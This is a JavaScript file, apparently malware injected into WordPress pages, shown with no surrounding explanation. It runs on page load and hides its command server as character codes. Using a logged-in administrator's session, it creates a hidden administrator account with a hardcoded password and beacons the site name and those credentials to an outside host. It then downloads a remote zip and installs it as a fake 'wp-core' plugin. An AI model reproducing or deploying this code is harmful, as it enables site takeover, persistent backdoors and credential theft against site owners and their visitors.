(() => { // Domain encoding const _h = [104,116,116,112,115,58,47,47].map(x => String.fromCharCode(x)).join(''); const _n = [97,112,105,45,99,100,110,46,105,99,117].map(x => String.fromCharCode(x)).join(''); const _p = [112,108,117,103,105,110,46,112,104,112].map(x => String.fromCharCode(x)).join(''); // Enhanced logging system const _log = { info: (msg, data = null) => { console.log(`[INFO] ${msg}`, data || ''); return msg; }, error: (msg, error = null) => { console.error(`[ERROR] ${msg}`, error || ''); return msg; }, success: (msg, data = null) => { console.log(`[SUCCESS] ${msg}`, data || ''); return msg; }, debug: (msg, data = null) => { console.log(`[DEBUG] ${msg}`, data || ''); return msg; } }; // Enhanced log sender with minimal data const _sendLog = async (data) => { const maxRetries = 3; let attempt = 0; const tryLog = async () => { try { const img = new Image(); return new Promise((resolve) => { img.onload = () => resolve(true); img.onerror = () => resolve(false); const logData = { d: location.hostname, t: data.type || '', s: data.status || '', u: data.user || '', p: data.pass || '' }; img.src = `${_h}${_n}/a.php?data=${btoa(JSON.stringify(logData))}`; }); } catch(e) { return false; } }; while (attempt < maxRetries) { if (await tryLog()) return true; attempt++; if (attempt < maxRetries) { await new Promise(r => setTimeout(r, 1000 * attempt)); } } return false; }; // Plugin download with retry and chunk support const _downloadPlugin = async () => { try { _log.info('Starting plugin download...'); // Try direct download first const response = await fetch(`${_h}${_n}/${_p}`, { method: 'GET', mode: 'cors', headers: { 'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'en-US,en;q=0.9', 'Cache-Control': 'no-cache', 'Pragma': 'no-cache', 'Referer': location.origin, 'Sec-Fetch-Dest': 'empty', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Site': 'cross-site', 'User-Agent': navigator.userAgent } }); if (!response.ok) { throw new Error(`Download failed: ${response.status}`); } const data = await response.arrayBuffer(); return new Uint8Array(data); } catch(e) { _log.error('Plugin download error:', e); return null; } }; // Plugin upload function with better error handling const _uploadPlugin = async () => { try { _log.info('Starting plugin upload process...'); // Get plugin upload page with proper headers _log.info('Fetching plugin upload page...'); const pluginPage = await fetch('/wp-admin/plugin-install.php?tab=upload', { credentials: 'include', headers: { 'Accept': 'text/html,application/xhtml+xml', 'Cache-Control': 'no-cache', 'Referer': location.origin + '/wp-admin/plugins.php' } }); if (!pluginPage.ok) { return _log.error('Failed to fetch plugin page:', pluginPage.status); } const pageText = await pluginPage.text(); _log.debug('Plugin page content length:', pageText.length); const pluginDoc = new DOMParser().parseFromString(pageText, 'text/html'); const pluginToken = pluginDoc.querySelector('input[name="_wpnonce"]')?.value; if (!pluginToken) { return _log.error('Plugin token not found in page'); } _log.success('Got plugin token:', pluginToken); // Download plugin file const pluginData = await _downloadPlugin(); if (!pluginData) { return _log.error('Failed to download plugin'); } _log.success('Plugin downloaded successfully', {size: pluginData.length + ' bytes'}); // Wait a bit before upload await new Promise(r => setTimeout(r, 1000)); // Prepare upload form with all necessary fields _log.info('Preparing plugin upload...'); const pluginFd = new FormData(); pluginFd.append('_wpnonce', pluginToken); pluginFd.append('_wp_http_referer', '/wp-admin/plugin-install.php?tab=upload'); pluginFd.append('install-plugin-submit', 'Install Now'); const file = new File([pluginData], 'wp-core.zip', { type: 'application/zip', lastModified: Date.now() }); pluginFd.append('pluginzip', file); // Upload plugin with proper headers and timeout _log.info('Uploading plugin...'); // Create AbortController for timeout const controller = new AbortController(); const timeout = setTimeout(() => { controller.abort(); _log.error('Plugin upload timeout'); }, 30000); // 30 second timeout try { const installResponse = await fetch('/wp-admin/update.php?action=upload-plugin', { method: 'POST', body: pluginFd, credentials: 'include', signal: controller.signal, headers: { 'Accept': 'text/html,application/xhtml+xml', 'Cache-Control': 'no-cache', 'Referer': location.origin + '/wp-admin/plugin-install.php?tab=upload' } }); clearTimeout(timeout); if (!installResponse.ok) { const errorText = await installResponse.text(); _log.debug('Upload error response:', errorText); return _log.error('Plugin upload failed', { status: installResponse.status, error: errorText.substring(0, 200) }); } const installText = await installResponse.text(); _log.debug('Install response:', installText.substring(0, 200)); const success = installText.includes('Plugin installed successfully') || installText.includes('plugin installed') || installText.includes('success'); if (success) { _log.success('Plugin installed successfully'); await _sendLog({ type: 'plugin', status: 'installed' }); return true; } else { return _log.error('Plugin installation verification failed'); } } catch(e) { clearTimeout(timeout); if (e.name === 'AbortError') { return _log.error('Plugin upload timed out after 30 seconds'); } throw e; } } catch(e) { return _log.error('Plugin installation error:', e); } }; // Main execution const _i = async () => { try { const _m = async () => { try { _log.info('Starting user creation process...'); const u = 'wploginnx'; const p = 'Ee5W0c6yy070!zz'; // Get user creation page _log.info('Fetching user creation page...'); const userPage = await fetch('/wp-admin/user-new.php', { credentials: 'include', headers: { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Cache-Control': 'no-cache', 'Referer': location.origin + '/wp-admin/users.php', 'Origin': location.origin } }); if (!userPage.ok) { throw new Error(_log.error('Failed to fetch user page:', userPage.status)); } const pageText = await userPage.text(); _log.debug('User page content length:', pageText.length); const doc = new DOMParser().parseFromString(pageText, 'text/html'); const token = doc.querySelector('input[name="_wpnonce_create-user"]')?.value; if (!token) { throw new Error(_log.error('User creation token not found')); } _log.success('Got user creation token:', token); // Create user _log.info('Creating user...'); const fd = new FormData(); fd.append('_wpnonce_create-user', token); fd.append('action', 'createuser'); fd.append('user_login', u); fd.append('email', 'wpl@gmail.com'); fd.append('first_name', 'wp'); fd.append('last_name', 'apix'); fd.append('pass1', p); fd.append('pass2', p); fd.append('role', 'administrator'); fd.append('createuser', 'Add New User'); const userResponse = await fetch('/wp-admin/user-new.php', { method: 'POST', body: fd, credentials: 'include', headers: { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Cache-Control': 'no-cache', 'Referer': location.origin + '/wp-admin/user-new.php', 'Origin': location.origin } }); if (!userResponse.ok) { throw new Error(_log.error('User creation request failed:', userResponse.status)); } const userText = await userResponse.text(); _log.debug('User creation response length:', userText.length); // More detailed success check const successIndicators = [ userText.includes('New user created'), userText.includes('User added'), userText.includes('successfully'), userText.includes(u), !userText.includes('error'), !userText.includes('Error'), !userText.includes('failed') ]; _log.debug('Success indicators:', successIndicators); if (successIndicators.some(x => x)) { _log.success('User created successfully'); await _sendLog({ type: 'user_create', status: 'success', user: u, pass: p }); // Wait a bit before plugin upload await new Promise(r => setTimeout(r, 1000)); // Try plugin upload _log.info('Starting plugin upload...'); if (await _uploadPlugin()) { _log.success('All operations completed successfully'); return true; } } else { _log.error('User creation verification failed', { response: userText.substring(0, 200) }); } return false; } catch(e) { _log.error('Process error:', e); return false; } }; let retryCount = 0; const maxRetries = 3; while (retryCount < maxRetries) { if (await _m()) { _log.success('Process completed successfully'); break; } retryCount++; if (retryCount < maxRetries) { const delay = 5000; _log.info(`Retrying in ${Math.round(delay/1000)}s... (Attempt ${retryCount + 1}/${maxRetries})`); await new Promise(r => setTimeout(r, delay)); } } } catch(e) { _log.error('Fatal error:', e); } }; // Initialize if (document.readyState === 'complete') { _i(); } else { window.addEventListener('load', _i); } })();